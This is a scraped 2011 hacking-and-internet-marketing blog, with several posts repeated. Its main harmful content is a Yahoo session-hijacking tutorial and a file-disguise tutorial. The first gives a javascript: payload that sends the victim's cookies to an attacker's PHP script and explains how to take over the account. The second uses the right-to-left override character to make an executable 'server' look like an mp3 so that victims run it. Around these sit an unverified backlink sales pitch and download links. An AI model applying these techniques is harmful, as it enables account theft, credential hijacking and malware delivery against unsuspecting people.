TreaSure Map To Online Riches
Guiding Principle To Show You Exactly Where To Dig in Order to find Wealth and sucess online
Master Resell Right ?
Quote:You Have Full Master Resell Right (MRR) To This Report,
You May Be
. Sell it in any prize you want
. Gave it Away For Free
. Sell it on auctions Sites
. Sell it indiviually or a in a package
. Offer it as a Bonus
. Include it in a membership Site
Download :
http://www.filesonic.com/file/1026418124
Wednesday, 18 May 2011
//
Labels:
Ebooks
//
1 comments
//
About It :
"It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system"
Download Now.!
HTTrack Version 3.44-1 [Windows 2000/XP/Vista/Seven]
"It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system"
Download Now.!
HTTrack Version 3.44-1 [Windows 2000/XP/Vista/Seven]
// //
2
comments
//
"Rank #1 On Google! UNLIMITED EDU And GOV Backlinks (BRAND NEW SOFTWARE)"
A sneak peek into this WSO
Hey warriors,
I'm super excited today! I just put the finishing touches on a killer new backlink software.
Now, you probably already know you need backlinks if you want to rank on the first page of Google.
In fact, you've probably heard it over and again...
But, did you know that just one .edu or .gov backlink can give you TEN TIMES MORE link juice then a .com backlink?
Yes, it's true!
How Many Edu And Gov Backlinks Do You Need?
You see it's all about search engine "trust".
And .edu and .gov websites have MUCH higher trust in the eyes of search engines than regular websites.
The only problem is a time-sucking nightmare to try and manually scour the Internet for .edu and .gov backlinks.
Let Backlink Loophole Do All The Hard Work!
If you have time to waste... then go for it. I wish you the best of luck!
But, if you value your time like I do then download my Backlink Loophole software right now.
It's never been easier to get high-quality .edu or .gov backlinks at the push of a button.
Sales page:
To Download:
http://www.filesonic.com/file/1020544934
A sneak peek into this WSO
Hey warriors,
I'm super excited today! I just put the finishing touches on a killer new backlink software.
Now, you probably already know you need backlinks if you want to rank on the first page of Google.
In fact, you've probably heard it over and again...
But, did you know that just one .edu or .gov backlink can give you TEN TIMES MORE link juice then a .com backlink?
Yes, it's true!
How Many Edu And Gov Backlinks Do You Need?
You see it's all about search engine "trust".
And .edu and .gov websites have MUCH higher trust in the eyes of search engines than regular websites.
The only problem is a time-sucking nightmare to try and manually scour the Internet for .edu and .gov backlinks.
Let Backlink Loophole Do All The Hard Work!
If you have time to waste... then go for it. I wish you the best of luck!
But, if you value your time like I do then download my Backlink Loophole software right now.
It's never been easier to get high-quality .edu or .gov backlinks at the push of a button.
Sales page:
Code:
http://www.warriorforum.com/warrior-special-offers-forum/379222-rank-1-google-unlimited-edu-gov-backlinks-brand-new-software.html
To Download:
http://www.filesonic.com/file/1020544934
Tuesday, 17 May 2011
//
Labels:
Hacking Tools
//
1 comments
//
This is a real easy Fix.
People always say you gotta format your hardrive that is all wrong wrong wrong Here is a much better way to do it.
Start > Run > Regedit > HKEY_Local_machine > Software > Policies > Microsoft > WindowsFirewall > if you see something that says StanderProfile Or something close to that Click on it and Delete the EnableFirewall and Remove the StanderProfile.
Then open up Windows Firewall, Switch it to ON, Then back to OFF and see if it works.
;)
People always say you gotta format your hardrive that is all wrong wrong wrong Here is a much better way to do it.
Start > Run > Regedit > HKEY_Local_machine > Software > Policies > Microsoft > WindowsFirewall > if you see something that says StanderProfile Or something close to that Click on it and Delete the EnableFirewall and Remove the StanderProfile.
Then open up Windows Firewall, Switch it to ON, Then back to OFF and see if it works.
;)
Thursday, 28 April 2011
//
Labels:
Tutorials
//
2
comments
//
HACK YAHOO ACCOUNT BY STEALING COOKIES (SESSION HIJACKING)
Author : CR@SH n Burn
I am gonna tell you how to hack any yahoo account by stealing cookies or we can say stealing session IDs.
First of all I want to tell you the basics of the cookies.
What are session cookies or session IDs?
Whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. Session cookies enable the website you are visiting to keep track of your movement from page to page so you don't get asked for the same information you've already given to the site. Cookies allow you to proceed through many pages of a site quickly and easily without having to authenticate or reprocess each new area you visit. This piece of string or login session is destroyed when we click on 'Sign Out' option.
Just visit yahoo.com. Type in browser
Code:
javascript:alert(document.cookie);
You would get a pop up box showing you the cookies left by yahoo on our PC.
Now login to your account and do same thing, you would see some more elements added to the cookies. These represent sessions ids.
So it means sessions are stored in our browser in form of cookies.
An attacker can steal that session by convincing slave to run a piece of code in browser. Attacker can use that stolen session to login into slave's account without providing any username/password. This attack is very uncommon because when the slave clicks 'Sign out', session gets destroyed and attacker too also gets signed out.
But in case of yahoo, it’s not the same. The attacker doesn’t get signed out when slave clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions again for next 24 hrs. This means, once the yahoo account session is stolen, attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.
Download the required script from here:
Steps for stealing session cookies:
1. Sign Up for an account at any free web hosting site.
I have chosen my3gb.com.
2. Now login to your account and go to file manager.
3. Now upload the four files that you have just downloaded. And also make a new directory named 'cookies' here.
4. Now give this code to slave to run in his browser when he would be logged in to his yahoo account.
Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
Quote:
Here is Yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.Stolen cookies get stored in directory 'cookies'
When the slave runs the code in his browser, he would again redirect to his yahoo account.
5. Now open the hacked.php.
Url would be: http://yourdomain.com/hacked.php
And enter the password (Default password is CR@5H n BURN)
Now you must have got the username of slave's account. Simply Click on it and it would take you to inbox of slave's yahoo account without asking for any password.
Now it doesn't matter if slave signs out from his account, you would remain logged into it.
Note: You can try this attack by using two browsers. Sign in into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.
Thanks
Credit goes to M. Makker
You can download the written guide from here(PDF):
http://hotfile.com/dl/109401527/8a29ad6/...s.rar.html
http://hotfile.com/dl/109401527/8a29ad6/...s.rar.html
//
Labels:
Tutorials
//
1 comments
//
Original tutorial by me. Enjoy!
This tutorial will show you how to make your .exe (or .com/.scr) files look like .jpeg/.mp3 or any other filetype! By normally changing the extension to e.g .mp3, will corrupt your file, but with this exploit your file will still be executable!
__
1. I have my server.exe, but I want it to look like a mp3 file, so people would run it. In this case, you should change the .exe to .scr to make it look more legit in the end.
Now, rename your server.scr (which is still executable) to "songname uploaded by .SCR" (notice the space).
2. Now it's time to use the exploit! Open up the Character Map:
Scroll down and find the "U+202E: Right-To-Left Override" character:
Click "Select" and then "Copy".
3. Now choose to rename your file, and paste the copied character right before the ".SCR" (press ctrl+v to paste)
Then type "3pm" (without the " ") and press Enter. Now it should look like this:
Done! Obviously you might want to change the icon to look like an mp3 before doing this..
A short video can be found here:
- [MediaFire]
- [MultiUpload]
- [Youtube]
(Watch in HD + Fullscreen)
__
Most browsers have patched this, but it can be used on IM's like MSN or Yahoo Messenger. To upload the file to a filehost, you need to make a .rar file with your server inside.
Spoiler (Click to Hide)
Now go ahead and mix around with .exe/.scr/.com and the fake-extensions to find some other legit-looking combinations!
If you have any questions, feel free to ask!
Also, here's a .pdf explaining the exploit: http://dl.packetstormsecurity.net/papers...erride.pdf
And PLEASE say 'Thanks!' if you find this tutorial useful!
__
Those who can't find the character in the default CharMap in windows, do this:(not sure if it works but worth a try)
1. Download BabelMap and run it.
2. Open this picture:
- Make sure "Single Font" is ticked and "Arial Unicode MS" is chosen as Font.
- Search for OVERRIDE and click on the RTLO character (row 2020, column E)
- Click on the Select-button
- Click on the Copy button
Also, those who have problems with WinXP and non-english OS versions, take a look atthis.
//
Labels:
Tutorials
//
1 comments
//